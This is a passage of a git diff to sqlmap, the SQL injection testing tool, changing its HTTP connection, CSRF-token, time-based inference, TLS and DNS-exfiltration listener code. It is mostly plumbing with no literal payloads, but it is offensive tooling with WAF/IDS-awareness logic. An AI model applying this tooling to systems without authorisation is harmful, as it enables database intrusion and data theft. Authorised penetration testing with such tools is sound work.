%s):\n" % (threadData.lastRequestUID, code, status) if responseHeaders: - logHeaders = "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()) + logHeaders = "\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()]) logHTTPTraffic(requestMsg, "%s%s\n\n%s" % (responseMsg, logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE])) @@ -543,25 +590,25 @@ class Connect(object): elif conf.verbose > 5: responseMsg += "%s\n\n%s" % (logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE]) - logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) + if not multipart: + logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) - if e.code == httplib.UNAUTHORIZED and not conf.ignore401: + if ex.code == httplib.UNAUTHORIZED and not conf.ignore401: errMsg = "not authorized, try to provide right HTTP " errMsg += "authentication type and valid credentials (%d)" % code raise SqlmapConnectionException(errMsg) - elif e.code == httplib.NOT_FOUND: + elif ex.code == httplib.NOT_FOUND: if raise404: errMsg = "page not found (%d)" % code raise SqlmapConnectionException(errMsg) else: debugMsg = "page not found (%d)" % code singleTimeLogMessage(debugMsg, logging.DEBUG) - processResponse(page, responseHeaders) - elif e.code == httplib.GATEWAY_TIMEOUT: + elif ex.code == httplib.GATEWAY_TIMEOUT: if ignoreTimeout: - return None, None, None + return None if not conf.ignoreTimeouts else "", None, None else: - warnMsg = "unable to connect to the target URL (%d - %s)" % (e.code, httplib.responses[e.code]) + warnMsg = "unable to connect to the target URL (%d - %s)" % (ex.code, httplib.responses[ex.code]) if threadData.retriesCount < conf.retries and not kb.threadException: warnMsg += ". 
sqlmap is going to retry the request" logger.critical(warnMsg) @@ -575,22 +622,46 @@ class Connect(object): debugMsg = "got HTTP error code: %d (%s)" % (code, status) logger.debug(debugMsg) - except (urllib2.URLError, socket.error, socket.timeout, httplib.HTTPException, struct.error, ProxyError, SqlmapCompressionException, WebSocketException), e: + except (urllib2.URLError, socket.error, socket.timeout, httplib.HTTPException, struct.error, binascii.Error, ProxyError, SqlmapCompressionException, WebSocketException, TypeError, ValueError): tbMsg = traceback.format_exc() - if "no host given" in tbMsg: + if checking: + return None, None, None + elif "no host given" in tbMsg: warnMsg = "invalid URL address used (%s)" % repr(url) raise SqlmapSyntaxException(warnMsg) elif "forcibly closed" in tbMsg or "Connection is already closed" in tbMsg: warnMsg = "connection was forcibly closed by the target URL" elif "timed out" in tbMsg: + if not conf.disablePrecon: + singleTimeWarnMessage("turning off pre-connect mechanism because of connection time out(s)") + conf.disablePrecon = True + + if kb.testMode and kb.testType not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED): + kb.responseTimes.clear() + if kb.testMode and kb.testType not in (None, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED): - singleTimeWarnMessage("there is a possibility that the target (or WAF) is dropping 'suspicious' requests") + singleTimeWarnMessage("there is a possibility that the target (or WAF/IPS/IDS) is dropping 'suspicious' requests") + kb.droppingRequests = True warnMsg = "connection timed out to the target URL" + elif "Connection reset" in tbMsg: + if not conf.disablePrecon: + singleTimeWarnMessage("turning off pre-connect mechanism because of connection reset(s)") + conf.disablePrecon = True + + if kb.testMode: + singleTimeWarnMessage("there is a possibility that the target (or WAF/IPS/IDS) is resetting 'suspicious' requests") + kb.droppingRequests = True + warnMsg = "connection reset to the target URL" elif "URLError" in tbMsg or "error" in tbMsg: warnMsg = "unable to connect to the target URL" + match = re.search(r"Errno \d+\] ([^>]+)", tbMsg) + if match: + warnMsg += " ('%s')" % match.group(1).strip() elif "NTLM" in tbMsg: warnMsg = "there has been a problem with NTLM authentication" + elif "Invalid header name" in tbMsg: # (e.g. PostgreSQL ::Text payload) + return None, None, None elif "BadStatusLine" in tbMsg: warnMsg = "connection dropped or unknown HTTP " warnMsg += "status code received" @@ -607,19 +678,37 @@ class Connect(object): else: warnMsg = "unable to connect to the target URL" - if "BadStatusLine" not in tbMsg: + if "BadStatusLine" not in tbMsg and any((conf.proxy, conf.tor)): warnMsg += " or proxy" if silent: return None, None, None - elif "forcibly closed" in tbMsg: + + with kb.locks.connError: + kb.connErrorCounter += 1 + + if kb.connErrorCounter >= MAX_CONSECUTIVE_CONNECTION_ERRORS and kb.connErrorChoice is None: + message = "there seems to be a continuous problem with connection to the target. " + message += "Are you sure that you want to continue " + message += "with further target testing? 
[y/N] " + + kb.connErrorChoice = readInput(message, default='N', boolean=True) + + if kb.connErrorChoice is False: + raise SqlmapConnectionException(warnMsg) + + if "forcibly closed" in tbMsg: logger.critical(warnMsg) return None, None, None elif ignoreTimeout and any(_ in tbMsg for _ in ("timed out", "IncompleteRead")): - return None, None, None + return None if not conf.ignoreTimeouts else "", None, None elif threadData.retriesCount < conf.retries and not kb.threadException: warnMsg += ". sqlmap is going to retry the request" - logger.critical(warnMsg) + if not retrying: + warnMsg += "(s)" + logger.critical(warnMsg) + else: + logger.debug(warnMsg) return Connect._retryProxy(**kwargs) elif kb.testMode: logger.critical(warnMsg) @@ -628,19 +717,19 @@ class Connect(object): raise SqlmapConnectionException(warnMsg) finally: - if not isinstance(page, unicode): + if isinstance(page, basestring) and not isinstance(page, unicode): if HTTP_HEADER.CONTENT_TYPE in (responseHeaders or {}) and not re.search(TEXT_CONTENT_TYPE_REGEX, responseHeaders[HTTP_HEADER.CONTENT_TYPE]): page = unicode(page, errors="ignore") else: page = getUnicode(page) socket.setdefaulttimeout(conf.timeout) - processResponse(page, responseHeaders) + processResponse(page, responseHeaders, status) if conn and getattr(conn, "redurl", None): _ = urlparse.urlsplit(conn.redurl) _ = ("%s%s" % (_.path or "/", ("?%s" % _.query) if _.query else "")) - requestMsg = re.sub("(\n[A-Z]+ ).+?( HTTP/\d)", "\g<1>%s\g<2>" % re.escape(getUnicode(_)), requestMsg, 1) + requestMsg = re.sub("(\n[A-Z]+ ).+?( HTTP/\d)", "\g<1>%s\g<2>" % getUnicode(_).replace("\\", "\\\\"), requestMsg, 1) if kb.resendPostOnRedirect is False: requestMsg = re.sub("(\[#\d+\]:\n)POST ", "\g<1>GET ", requestMsg) @@ -652,7 +741,7 @@ class Connect(object): responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status) if responseHeaders: - logHeaders = "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()) + logHeaders = "\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()]) if not skipLogTraffic: logHTTPTraffic(requestMsg, "%s%s\n\n%s" % (responseMsg, logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE])) @@ -662,7 +751,8 @@ class Connect(object): elif conf.verbose > 5: responseMsg += "%s\n\n%s" % (logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE]) - logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) + if not multipart: + logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) return page, responseHeaders, code @@ -718,7 +808,7 @@ class Connect(object): payload = function(payload=payload, headers=auxHeaders) except Exception, ex: errMsg = "error occurred while running tamper " - errMsg += "function '%s' ('%s')" % (function.func_name, ex) + errMsg += "function '%s' ('%s')" % (function.func_name, getSafeExString(ex)) raise SqlmapGenericException(errMsg) if not isinstance(payload, basestring): @@ -728,7 +818,7 @@ class Connect(object): value = agent.replacePayload(value, payload) - logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload)) + logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload.replace('\\', BOUNDARY_BACKSLASH_MARKER)).replace(BOUNDARY_BACKSLASH_MARKER, '\\')) if place == PLACE.CUSTOM_POST and kb.postHint: if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML): @@ -750,9 +840,20 @@ class Connect(object): value = agent.replacePayload(value, payload) 
else: # GET, POST, URI and Cookie payload needs to be thoroughly URL encoded - if place in (PLACE.GET, PLACE.URI, PLACE.COOKIE) and not conf.skipUrlEncode or place in (PLACE.POST, PLACE.CUSTOM_POST) and kb.postUrlEncode: - payload = urlencode(payload, '%', False, place != PLACE.URI) # spaceplus is handled down below - value = agent.replacePayload(value, payload) + if (place in (PLACE.GET, PLACE.URI, PLACE.COOKIE) or place == PLACE.CUSTOM_HEADER and value.split(',')[0] == HTTP_HEADER.COOKIE) and not conf.skipUrlEncode or place in (PLACE.POST, PLACE.CUSTOM_POST) and kb.postUrlEncode: + skip = False + + if place == PLACE.COOKIE or place == PLACE.CUSTOM_HEADER and value.split(',')[0] == HTTP_HEADER.COOKIE: + if kb.cookieEncodeChoice is None: + msg = "do you want to URL encode cookie values (implementation specific)? %s" % ("[Y/n]" if not conf.url.endswith(".aspx") else "[y/N]") # Reference: https://support.microsoft.com/en-us/kb/313282 + choice = readInput(msg, default='Y' if not conf.url.endswith(".aspx") else 'N') + kb.cookieEncodeChoice = choice.upper().strip() == 'Y' + if not kb.cookieEncodeChoice: + skip = True + + if not skip: + payload = urlencode(payload, '%', False, place != PLACE.URI) # spaceplus is handled down below + value = agent.replacePayload(value, payload) if conf.hpp: if not any(conf.url.lower().endswith(_.lower()) for _ in (WEB_API.ASP, WEB_API.ASPX)): @@ -789,9 +890,13 @@ class Connect(object): if PLACE.GET in conf.parameters: get = conf.parameters[PLACE.GET] if place != PLACE.GET or not value else value + elif place == PLACE.GET: # Note: for (e.g.) checkWaf() when there are no GET parameters + get = value if PLACE.POST in conf.parameters: post = conf.parameters[PLACE.POST] if place != PLACE.POST or not value else value + elif place == PLACE.POST: + post = value if PLACE.CUSTOM_POST in conf.parameters: post = conf.parameters[PLACE.CUSTOM_POST].replace(CUSTOM_INJECTION_MARK_CHAR, "") if place != PLACE.CUSTOM_POST or not value else value @@ -815,30 +920,41 @@ class Connect(object): uri = conf.url if value and place == PLACE.CUSTOM_HEADER: - auxHeaders[value.split(',')[0]] = value.split(',', 1)[1] + if value.split(',')[0].capitalize() == PLACE.COOKIE: + cookie = value.split(',', 1)[1] + else: + auxHeaders[value.split(',')[0]] = value.split(',', 1)[1] if conf.csrfToken: def _adjustParameter(paramString, parameter, newValue): retVal = paramString - match = re.search("%s=(?P<value>[^&]*)" % re.escape(parameter), paramString) + match = re.search("%s=[^&]*" % re.escape(parameter), paramString) if match: - retVal = re.sub("%s=[^&]*" % re.escape(parameter), "%s=%s" % (parameter, newValue), paramString) + retVal = re.sub(re.escape(match.group(0)), "%s=%s" % (parameter, newValue), paramString) + else: + match = re.search("(%s[\"']:[\"'])([^\"']+)" % re.escape(parameter), paramString) + if match: + retVal = re.sub(re.escape(match.group(0)), "%s%s" % (match.group(1), newValue), paramString) return retVal page, headers, code = Connect.getPage(url=conf.csrfUrl or conf.url, data=conf.data if conf.csrfUrl == conf.url else None, method=conf.method if conf.csrfUrl == conf.url else None, cookie=conf.parameters.get(PLACE.COOKIE), direct=True, silent=True, ua=conf.parameters.get(PLACE.USER_AGENT), referer=conf.parameters.get(PLACE.REFERER), host=conf.parameters.get(PLACE.HOST)) match = re.search(r"<input[^>]+name=[\"']?%s[\"']?\s[^>]*value=(\"([^\"]+)|'([^']+)|([^ >]+))" % re.escape(conf.csrfToken), page or "") token = (match.group(2) or match.group(3) or match.group(4)) if match else None + if 
not token: + match = re.search(r"%s[\"']:[\"']([^\"']+)" % re.escape(conf.csrfToken), page or "") + token = match.group(1) if match else None + if not token: if conf.csrfUrl != conf.url and code == httplib.OK: if headers and "text/plain" in headers.get(HTTP_HEADER.CONTENT_TYPE, ""): token = page - if not token and any(_.name == conf.csrfToken for _ in conf.cj): + if not token and conf.cj and any(_.name == conf.csrfToken for _ in conf.cj): for _ in conf.cj: if _.name == conf.csrfToken: token = _.value - if not any (conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))): + if not any(conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))): if post: post = "%s%s%s=%s" % (post, conf.paramDel or DEFAULT_GET_POST_DELIMITER, conf.csrfToken, token) elif get: @@ -889,11 +1005,16 @@ class Connect(object): if conf.evalCode: delimiter = conf.paramDel or DEFAULT_GET_POST_DELIMITER - variables = {"uri": uri} + variables = {"uri": uri, "lastPage": threadData.lastPage, "_locals": locals()} originals = {} keywords = keyword.kwlist - for item in filter(None, (get, post if not kb.postHint else None)): + if not get and PLACE.URI in conf.parameters: + query = urlparse.urlsplit(uri).query or "" + else: + query = None + + for item in filter(None, (get, post if not kb.postHint else None, query)): for part in item.split(delimiter): if '=' in part: name, value = part.split('=', 1) @@ -915,18 +1036,21 @@ class Connect(object): while True: try: - compiler.parse(conf.evalCode.replace(';', '\n')) + compiler.parse(unicodeencode(conf.evalCode.replace(';', '\n'))) except SyntaxError, ex: - original = replacement = ex.text.strip() - for _ in re.findall(r"[A-Za-z_]+", original)[::-1]: - if _ in keywords: - replacement = replacement.replace(_, "%s%s" % (_, EVALCODE_KEYWORD_SUFFIX)) + if ex.text: + original = replacement = ex.text.strip() + for _ in re.findall(r"[A-Za-z_]+", original)[::-1]: + if _ in keywords: + replacement = replacement.replace(_, "%s%s" % (_, EVALCODE_KEYWORD_SUFFIX)) + break + if original == replacement: + conf.evalCode = conf.evalCode.replace(EVALCODE_KEYWORD_SUFFIX, "") break - if original == replacement: - conf.evalCode = conf.evalCode.replace(EVALCODE_KEYWORD_SUFFIX, "") - break + else: + conf.evalCode = conf.evalCode.replace(getUnicode(ex.text.strip(), UNICODE_ENCODING), replacement) else: - conf.evalCode = conf.evalCode.replace(ex.text.strip(), replacement) + break else: break @@ -945,16 +1069,34 @@ class Connect(object): if name != "__builtins__" and originals.get(name, "") != value: if isinstance(value, (basestring, int)): found = False - value = unicode(value) + value = getUnicode(value, UNICODE_ENCODING) + + if kb.postHint and re.search(r"\b%s\b" % re.escape(name), post or ""): + if kb.postHint in (POST_HINT.XML, POST_HINT.SOAP): + if re.search(r"<%s\b" % re.escape(name), post): + found = True + post = re.sub(r"(?s)(<%s\b[^>]*>)(.*?)(</%s)" % (re.escape(name), re.escape(name)), "\g<1>%s\g<3>" % value, post) + elif re.search(r"\b%s>" % re.escape(name), post): + found = True + post = re.sub(r"(?s)(\b%s>)(.*?)(</[^<]*\b%s>)" % (re.escape(name), re.escape(name)), "\g<1>%s\g<3>" % value, post) + + regex = r"\b(%s)\b([^\w]+)(\w+)" % re.escape(name) + if not found and re.search(regex, (post or "")): + found = True + post = re.sub(regex, "\g<1>\g<2>%s" % value, post) regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(delimiter), re.escape(name), re.escape(delimiter)) + if not found and re.search(regex, (post or 
"")): + found = True + post = re.sub(regex, "\g<1>%s\g<3>" % value, post) + if re.search(regex, (get or "")): found = True get = re.sub(regex, "\g<1>%s\g<3>" % value, get) - if re.search(regex, (post or "")): + if re.search(regex, (query or "")): found = True - post = re.sub(regex, "\g<1>%s\g<3>" % value, post) + uri = re.sub(regex.replace(r"\A", r"\?"), "\g<1>%s\g<3>" % value, uri) regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER), name, re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER)) if re.search(regex, (cookie or "")): @@ -978,35 +1120,38 @@ class Connect(object): elif kb.postUrlEncode: post = urlencode(post, spaceplus=kb.postSpaceToPlus) - if timeBasedCompare: - if len(kb.responseTimes) < MIN_TIME_RESPONSES: + if timeBasedCompare and not conf.disableStats: + if len(kb.responseTimes.get(kb.responseTimeMode, [])) < MIN_TIME_RESPONSES: clearConsoleLine() + kb.responseTimes.setdefault(kb.responseTimeMode, []) + if conf.tor: warnMsg = "it's highly recommended to avoid usage of switch '--tor' for " warnMsg += "time-based injections because of its high latency time" singleTimeWarnMessage(warnMsg) - warnMsg = "[%s] [WARNING] time-based comparison requires " % time.strftime("%X") + warnMsg = "[%s] [WARNING] %stime-based comparison requires " % (time.strftime("%X"), "(case) " if kb.responseTimeMode else "") warnMsg += "larger statistical model, please wait" dataToStdout(warnMsg) - while len(kb.responseTimes) < MIN_TIME_RESPONSES: - Connect.queryPage(content=True) + while len(kb.responseTimes[kb.responseTimeMode]) < MIN_TIME_RESPONSES: + value = kb.responseTimePayload.replace(RANDOM_INTEGER_MARKER, str(randomInt(6))).replace(RANDOM_STRING_MARKER, randomStr()) if kb.responseTimePayload else kb.responseTimePayload + Connect.queryPage(value=value, content=True, raise404=False) dataToStdout('.') - dataToStdout("\n") + dataToStdout(" (done)\n") elif not kb.testMode: - warnMsg = "it is very important not to stress the network adapter " + warnMsg = "it is very important to not stress the network connection " warnMsg += "during usage of time-based payloads to prevent potential " - warnMsg += "errors " + warnMsg += "disruptions " singleTimeWarnMessage(warnMsg) if not kb.laggingChecked: kb.laggingChecked = True - deviation = stdev(kb.responseTimes) + deviation = stdev(kb.responseTimes[kb.responseTimeMode]) if deviation > WARN_TIME_STDEV: kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE @@ -1042,9 +1187,9 @@ class Connect(object): _, headers, code = Connect.getPage(url=uri, get=get, post=post, method=method, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, auxHeaders=auxHeaders, raise404=raise404, skipRead=(kb.nullConnection == NULLCONNECTION.SKIP_READ)) if headers: - if kb.nullConnection in (NULLCONNECTION.HEAD, NULLCONNECTION.SKIP_READ) and HTTP_HEADER.CONTENT_LENGTH in headers: + if kb.nullConnection in (NULLCONNECTION.HEAD, NULLCONNECTION.SKIP_READ) and headers.get(HTTP_HEADER.CONTENT_LENGTH): pageLength = int(headers[HTTP_HEADER.CONTENT_LENGTH]) - elif kb.nullConnection == NULLCONNECTION.RANGE and HTTP_HEADER.CONTENT_RANGE in headers: + elif kb.nullConnection == NULLCONNECTION.RANGE and headers.get(HTTP_HEADER.CONTENT_RANGE): pageLength = int(headers[HTTP_HEADER.CONTENT_RANGE][headers[HTTP_HEADER.CONTENT_RANGE].find('/') + 1:]) finally: kb.pageCompress = popValue() @@ -1057,13 +1202,15 @@ class Connect(object): warnMsg = "site returned insanely large response" if kb.testMode: warnMsg += " in testing phase. 
This is a common " - warnMsg += "behavior in custom WAF/IDS/IPS solutions" + warnMsg += "behavior in custom WAF/IPS/IDS solutions" singleTimeWarnMessage(warnMsg) if conf.secondOrder: page, headers, code = Connect.getPage(url=conf.secondOrder, cookie=cookie, ua=ua, silent=silent, auxHeaders=auxHeaders, response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True) threadData.lastQueryDuration = calculateDeltaSeconds(start) + threadData.lastPage = page + threadData.lastCode = code kb.originalCode = kb.originalCode or code @@ -1073,7 +1220,8 @@ class Connect(object): if timeBasedCompare: return wasLastResponseDelayed() elif noteResponseTime: - kb.responseTimes.append(threadData.lastQueryDuration) + kb.responseTimes.setdefault(kb.responseTimeMode, []) + kb.responseTimes[kb.responseTimeMode].append(threadData.lastQueryDuration) if not response and removeReflection: page = removeReflectiveValues(page, payload) @@ -1082,12 +1230,12 @@ class Connect(object): kb.permissionFlag = re.search(PERMISSION_DENIED_REGEX, page or "", re.I) is not None if content or response: - return page, headers + return page, headers, code if getRatioValue: return comparison(page, headers, code, getRatioValue=False, pageLength=pageLength), comparison(page, headers, code, getRatioValue=True, pageLength=pageLength) else: return comparison(page, headers, code, getRatioValue, pageLength) -def setHTTPProxy(): # Cross-linked function +def setHTTPHandlers(): # Cross-linked function raise NotImplementedError diff --git a/lib/request/direct.py b/lib/request/direct.py index 937d6c5a4..0490c6207 100644 --- a/lib/request/direct.py +++ b/lib/request/direct.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -24,6 +24,7 @@ from lib.core.dicts import SQL_STATEMENTS from lib.core.enums import CUSTOM_LOGGING from lib.core.enums import DBMS from lib.core.enums import EXPECTED +from lib.core.enums import TIMEOUT_STATE from lib.core.settings import UNICODE_ENCODING from lib.utils.timeout import timeout @@ -51,13 +52,18 @@ def direct(query, content=True): start = time.time() if not select and "EXEC " not in query.upper(): - _ = timeout(func=conf.dbmsConnector.execute, args=(query,), duration=conf.timeout, default=None) + timeout(func=conf.dbmsConnector.execute, args=(query,), duration=conf.timeout, default=None) elif not (output and "sqlmapoutput" not in query and "sqlmapfile" not in query): - output = timeout(func=conf.dbmsConnector.select, args=(query,), duration=conf.timeout, default=None) - hashDBWrite(query, output, True) + output, state = timeout(func=conf.dbmsConnector.select, args=(query,), duration=conf.timeout, default=None) + if state == TIMEOUT_STATE.NORMAL: + hashDBWrite(query, output, True) + elif state == TIMEOUT_STATE.TIMEOUT: + conf.dbmsConnector.close() + conf.dbmsConnector.connect() elif output: infoMsg = "resumed: %s..." 
% getUnicode(output, UNICODE_ENCODING)[:20] logger.info(infoMsg) + threadData.lastQueryDuration = calculateDeltaSeconds(start) if not output: diff --git a/lib/request/dns.py b/lib/request/dns.py index 8f10a605a..a03ada19c 100644 --- a/lib/request/dns.py +++ b/lib/request/dns.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -59,14 +59,31 @@ class DNSQuery(object): class DNSServer(object): def __init__(self): + self._check_localhost() self._requests = [] self._lock = threading.Lock() - self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + try: + self._socket = socket._orig_socket(socket.AF_INET, socket.SOCK_DGRAM) + except AttributeError: + self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) self._socket.bind(("", 53)) self._running = False self._initialized = False + def _check_localhost(self): + response = "" + try: + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect(("", 53)) + s.send("6509012000010000000000010377777706676f6f676c6503636f6d00000100010000291000000000000000".decode("hex")) # A www.google.com + response = s.recv(512) + except: + pass + finally: + if response and "google" in response: + raise socket.error("another DNS service already running on *:53") + def pop(self, prefix=None, suffix=None): """ Returns received DNS resolution request (if any) that has given diff --git a/lib/request/httpshandler.py b/lib/request/httpshandler.py index 6906f4686..5f1eb2cde 100644 --- a/lib/request/httpshandler.py +++ b/lib/request/httpshandler.py @@ -1,17 +1,21 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ +import distutils.version import httplib +import re import socket import urllib2 +from lib.core.common import getSafeExString from lib.core.data import kb from lib.core.data import logger from lib.core.exception import SqlmapConnectionException +from lib.core.settings import PYVERSION ssl = None try: @@ -42,7 +46,30 @@ class HTTPSConnection(httplib.HTTPSConnection): success = False - if not kb.tlsSNI: + # Reference(s): https://docs.python.org/2/library/ssl.html#ssl.SSLContext + # https://www.mnot.net/blog/2014/12/27/python_2_and_tls_sni + if re.search(r"\A[\d.]+\Z", self.host) is None and kb.tlsSNI.get(self.host) != False and hasattr(ssl, "SSLContext"): + for protocol in filter(lambda _: _ >= ssl.PROTOCOL_TLSv1, _protocols): + try: + sock = create_sock() + context = ssl.SSLContext(protocol) + _ = context.wrap_socket(sock, do_handshake_on_connect=True, server_hostname=self.host) + if _: + success = True + self.sock = _ + _protocols.remove(protocol) + _protocols.insert(0, protocol) + break + else: + sock.close() + except (ssl.SSLError, socket.error, httplib.BadStatusLine), ex: + self._tunnel_host = None + logger.debug("SSL connection error occurred ('%s')" % getSafeExString(ex)) + + if kb.tlsSNI.get(self.host) is None: + kb.tlsSNI[self.host] = success + + if not success: for protocol in _protocols: try: sock = create_sock() @@ -55,32 +82,16 @@ class HTTPSConnection(httplib.HTTPSConnection): break else: sock.close() - except (ssl.SSLError, socket.error, httplib.BadStatusLine), errMsg: + except (ssl.SSLError, socket.error, httplib.BadStatusLine), ex: 
self._tunnel_host = None - logger.debug("SSL connection error occurred ('%s')" % errMsg) - - # Reference(s): https://docs.python.org/2/library/ssl.html#ssl.SSLContext - # https://www.mnot.net/blog/2014/12/27/python_2_and_tls_sni - if not success and hasattr(ssl, "SSLContext"): - for protocol in filter(lambda _: _ >= ssl.PROTOCOL_TLSv1, _protocols): - try: - sock = create_sock() - context = ssl.SSLContext(protocol) - _ = context.wrap_socket(sock, do_handshake_on_connect=False, server_hostname=self.host) - if _: - kb.tlsSNI = success = True - self.sock = _ - _protocols.remove(protocol) - _protocols.insert(0, protocol) - break - else: - sock.close() - except (ssl.SSLError, socket.error, httplib.BadStatusLine), errMsg: - self._tunnel_host = None - logger.debug("SSL connection error occurred ('%s')" % errMsg) + logger.debug("SSL connection error occurred ('%s')" % getSafeExString(ex)) if not success: - raise SqlmapConnectionException("can't establish SSL connection") + errMsg = "can't establish SSL connection" + # Reference: https://docs.python.org/2/library/ssl.html + if distutils.version.LooseVersion(PYVERSION) < distutils.version.LooseVersion("2.7.9"): + errMsg += " (please retry with Python >= 2.7.9)" + raise SqlmapConnectionException(errMsg) class HTTPSHandler(urllib2.HTTPSHandler): def https_open(self, req): diff --git a/lib/request/inject.py b/lib/request/inject.py index b12517ce4..c51cdb735 100644 --- a/lib/request/inject.py +++ b/lib/request/inject.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -39,6 +39,7 @@ from lib.core.enums import DBMS from lib.core.enums import EXPECTED from lib.core.enums import PAYLOAD from lib.core.exception import SqlmapConnectionException +from lib.core.exception import SqlmapDataException from lib.core.exception import SqlmapNotVulnerableException from lib.core.exception import SqlmapUserQuitException from lib.core.settings import MAX_TECHNIQUES_PER_VALUE @@ -56,7 +57,7 @@ from lib.techniques.union.use import unionUse def _goDns(payload, expression): value = None - if conf.dnsName and kb.dnsTest is not False and not kb.testMode and Backend.getDbms() is not None: + if conf.dnsDomain and kb.dnsTest is not False and not kb.testMode and Backend.getDbms() is not None: if kb.dnsTest is None: dnsTest(payload) @@ -78,7 +79,7 @@ def _goInference(payload, expression, charsetType=None, firstChar=None, lastChar timeBasedCompare = (kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) if not (timeBasedCompare and kb.dnsTest): - if (conf.eta or conf.threads > 1) and Backend.getIdentifiedDbms() and not re.search("(COUNT|LTRIM)\(", expression, re.I) and not timeBasedCompare: + if (conf.eta or conf.threads > 1) and Backend.getIdentifiedDbms() and not re.search("(COUNT|LTRIM)\(", expression, re.I) and not (timeBasedCompare and not conf.forceThreads): if field and re.search("\ASELECT\s+DISTINCT\((.+?)\)\s+FROM", expression, re.I): expression = "SELECT %s FROM (%s)" % (field, expression) @@ -189,7 +190,7 @@ def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, char countFirstField = queries[Backend.getIdentifiedDbms()].count.query % expressionFieldsList[0] countedExpression = expression.replace(expressionFields, countFirstField, 1) - if " ORDER BY " in expression.upper(): + if " ORDER BY " in countedExpression.upper(): _ = countedExpression.upper().rindex(" 
ORDER BY ") countedExpression = countedExpression[:_] @@ -207,22 +208,22 @@ def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, char message += "entries do you want to retrieve?\n" message += "[a] All (default)\n[#] Specific number\n" message += "[q] Quit" - test = readInput(message, default="a") + choice = readInput(message, default='A').upper() - if not test or test[0] in ("a", "A"): + if choice == 'A': stopLimit = count - elif test[0] in ("q", "Q"): + elif choice == 'Q': raise SqlmapUserQuitException - elif test.isdigit() and int(test) > 0 and int(test) <= count: - stopLimit = int(test) + elif choice.isdigit() and int(choice) > 0 and int(choice) <= count: + stopLimit = int(choice) infoMsg = "sqlmap is now going to retrieve the " infoMsg += "first %d query output entries" % stopLimit logger.info(infoMsg) - elif test[0] in ("#", "s", "S"): + elif choice in ('#', 'S'): message = "how many? " stopLimit = readInput(message, default="10") @@ -262,9 +263,14 @@ def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, char return None try: - for num in xrange(startLimit, stopLimit): - output = _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, num=num, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump) - outputs.append(output) + try: + for num in xrange(startLimit, stopLimit): + output = _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, num=num, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump) + outputs.append(output) + except OverflowError: + errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit) + errMsg += "with switch '--fresh-queries'" + raise SqlmapDataException(errMsg) except KeyboardInterrupt: print @@ -278,7 +284,7 @@ def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, char outputs = _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump) - return ", ".join(output for output in outputs) if not isNoneValue(outputs) else None + return ", ".join(output or "" for output in outputs) if not isNoneValue(outputs) else None def _goBooleanProxy(expression): """ @@ -287,7 +293,7 @@ def _goBooleanProxy(expression): initTechnique(kb.technique) - if conf.dnsName: + if conf.dnsDomain: query = 